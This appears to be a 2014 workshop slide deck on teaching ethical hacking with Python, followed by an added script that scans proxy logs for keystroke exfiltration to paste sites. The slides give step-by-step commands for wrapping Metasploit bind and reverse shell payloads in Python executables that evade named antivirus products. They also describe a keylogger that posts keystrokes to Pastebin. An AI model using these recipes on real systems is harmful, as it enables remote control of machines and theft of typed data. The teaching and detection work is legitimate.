Violent Python
Innovations in Cybersecurity Education Workshop
June 24, 2014
Bio
Pedagogy
Diversity in Education
• Students have different previous experience, knowledge and goals
• They aren't all going to learn the same things in the same class
• My goal is NOT to make them all achieve the same proficiency
• My goal is to provide every student with material they can grasp and interesting challenges
Beginners
• Textbook that covers the material
• Online training at CodeCademy
• DVDs with virtual machines ready to go
• Hands-on projects with complete step-by-step instructions
• Lab time after each class with the instructor available to help
• Extensive open lab time
Average Students
• Configure their own home machines to do the projects
• Work at home, with no instructor available
• Simple challenge projects without instructions
Advanced Students
• Advanced challenges
• Online security puzzle sites
• Cyber competitions
• Following the news, independent work on cutting-edge topics
Independent Projects
• Students can get extra credit by
  – Attending other training events
  – In-class presentations
  – Researching other tools or techniques
Grading
• Must achieve a level of points to get a good grade
• Many possible combinations of projects can get there
• May skip the final exam
CNIT 124 Advanced Ethical Hacking
Two Textbooks
Required / Optional
Violent Python
• Good coding principles
  – Exception handling
  – Modular design
  – Optimization
  – Commenting
  – Flow charts
• FORGET THEM ALL
Violent Python
• We are hackers
• We are here to BREAK STUFF
• It should be fast and easy for a complete novice to hack together a simple script to do something fun!
Projects
Antivirus
Ungh! Good God y'all...
What is it GOOD For?
Mikko Hypponen Video
Metasploit Payloads
Metasploit
• Hundreds of payloads
• The simplest one: bind_tcp
• Listens on a TCP port for commands
Simple Reverse Shell
• One command to produce very simple Windows EXE malware
Antivirus Catches It
Norton v. Shell.exe
Norton Identifies the Metasploit Packer
VirusTotal: 37/49 Detections
How to Become 007
Python v. AV Round 1
shell_bind_tcp
Export Metasploit Payloads to C
Use Ctypes Python Library
Compile it on Windows
• Install these things, in order
  – Python 2.7
  – PyWin32
  – pip-Win
  – PyInstaller
• This creates an EXE file that listens on a TCP port
DEMO
• On Kali
  msfpayload windows/shell_bind_tcp C > foo
  nano foo
• Change top to
  from ctypes import *
  shellcode = (
• Change bottom to
  );
  memorywithshell = create_string_buffer(shellcode, len(shellcode))
  shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
  shell()
DEMO
• On Windows, in pip-Win:
  venv -c -i pyi-env-name
  pyinstaller --onefile --noconsole foo
VirusTotal: 1/50 Detection
Norton Support
• I Tweeted about this, and @NortonSupport replied
• VirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning
• @NortonSupport gave me a link for a 30-day trial version :)
Norton Wins!
Kaspersky Wins!
• Avast! doesn't detect it
• Kaspersky detects it as HEUR:Trojan.Win32.Generic
Python v. AV Round 2
shell_bind_tcp with a delay
DEMO
• On Kali
  cp foo foo2
  nano foo2
  x=raw_input("Press Enter to continue")
• On Windows, in pip-Win:
  venv -c -i pyi-env-name
  pyinstaller --onefile foo2
Norton, Avast, & MSE Lose!
Kaspersky Wins!
Python v. AV Round 3
shell_bind_tcp in two stages, no delay
Other AV
• Tested on Mar 24, 2014 with a two-stage reverse shell and no time delay
• All these failed
  – Norton
  – Nod32
  – Avast!
  – 360 Internet Security
  – McAfee
  – Kaspersky
Remember Mikko?
F-Secure Wins!
AV Challenge
• Posted April 3, 2014
• No reply from AV vendors, but Norton improved its detection after that
  – Now a delay is required
Python v. AV Round 4
shell_bind_tcp with a delay
INSTRUCTIONS
• On Kali
  msfpayload windows/shell_reverse_tcp LHOST=192.168.119.252 C > rev
  nano rev
• Change top to
  x=raw_input("Press Enter to continue")
  from ctypes import *
  shellcode = (
• Change bottom to
  );
  memorywithshell = create_string_buffer(shellcode, len(shellcode))
  shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
  shell()
INSTRUCTIONS
• On Windows, in pip-Win:
  venv -c -i pyi-env-name
  pyinstaller --onefile rev
• On Kali
  nc -lp 4444
Norton Loses
Kaspersky Wins
Advanced Malware Protection
ty @ChrisAbdalla_1 from HP ESP TippingPoint
• A friend in the financial industry tested Evil.exe on a system protected by FireEye
• FireEye gives no alerts and lets it post keystrokes right to Pastebin
Python Keylogger
Google "Python Keylogger"
• I used this one from 4 years ago
Post Keystrokes to Pastebin
Problem
• Pastebin busted me for making too many pastes in a 24-hour period
• So I wrote my own Pastebin imitation
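Added defender-side example, not code from the slides: the channel described above (keystrokes POSTed over and over to Pastebin, and later to the author's own Pastebin look-alike) is visible in egress logs even when the endpoint product is silent. This script scans constructed proxy log lines for clients that POST repeatedly to a known paste site, or repeatedly to any single host; the log format, the watch list, the window and the thresholds are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed proxy log (not real traffic): "timestamp client method host path status"
SAMPLE_LOG = """\
2014-06-24T10:00:05 10.0.0.15 GET www.example.com / 200
2014-06-24T10:00:40 10.0.0.22 POST pastebin.com /api/api_post.php 200
2014-06-24T10:01:10 10.0.0.22 POST pastebin.com /api/api_post.php 200
2014-06-24T10:01:41 10.0.0.22 POST pastebin.com /api/api_post.php 200
2014-06-24T10:03:00 10.0.0.15 POST mail.example.com /send 200
2014-06-24T10:05:00 10.0.0.31 POST 203.0.113.9 /paste 200
2014-06-24T10:06:00 10.0.0.31 POST 203.0.113.9 /paste 200
2014-06-24T10:07:00 10.0.0.31 POST 203.0.113.9 /paste 200
2014-06-24T10:08:00 10.0.0.31 POST 203.0.113.9 /paste 200
2014-06-24T10:09:00 10.0.0.31 POST 203.0.113.9 /paste 200
2014-06-24T10:10:00 10.0.0.40 POST crm.example.com /save 200
2014-06-24T10:25:00 10.0.0.40 POST crm.example.com /save 200
this malformed line is skipped by the parser
"""

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) "
                    r"(?P<host>\S+) (?P<path>\S+) (?P<status>\d{3})$")
PASTE_SITES = {"pastebin.com", "paste.ee"}  # assumed watch list of paste sites
WINDOW = timedelta(minutes=10)              # assumed detection window
PASTE_SITE_THRESHOLD = 3                    # repeated pastes to a known paste site
GENERIC_THRESHOLD = 5                       # repeated POSTs to any one host (look-alike)

def parse_log(text):
    # Malformed lines are skipped rather than aborting the whole scan
    matches = (LOG_RE.match(line) for line in text.splitlines())
    return [(datetime.fromisoformat(m["ts"]), m["client"], m["method"], m["host"])
            for m in matches if m]

def max_in_window(times, window):
    # Largest number of timestamps that fall inside any interval of length `window`
    times, best, start = sorted(times), 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best

def find_paste_exfil(text, window=WINDOW):
    # Group POSTs per (client, destination host) and rate them over the window
    posts = defaultdict(list)
    for ts, client, method, host in parse_log(text):
        if method == "POST":
            posts[(client, host)].append(ts)
    alerts = []
    for (client, host), times in sorted(posts.items()):
        known = host in PASTE_SITES
        count = max_in_window(times, window)
        if count >= (PASTE_SITE_THRESHOLD if known else GENERIC_THRESHOLD):
            alerts.append({"client": client, "host": host, "posts": count,
                           "reason": "known paste site" if known else "repeated POSTs to one host"})
    return alerts
```

The generic rate rule is what catches the author's own imitation host, since a watch list only ever covers the paste sites you already know about; tune the window and thresholds against your proxy's normal POST baseline.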
Kaspersky & Avast! LOSE
Norton WINS!
But just add a delay...
F-Secure LOSES!
PRODUCT ANNOUNCEMENT!
Ultra-Advanced APT Tool
samsclass.info/evil.exe
UNSTOPPABLE
• None of these products stop it
  – Norton
  – McAfee
  – Kaspersky
  – Nod32
  – F-Secure
  – Avast!
  – Microsoft Security Essentials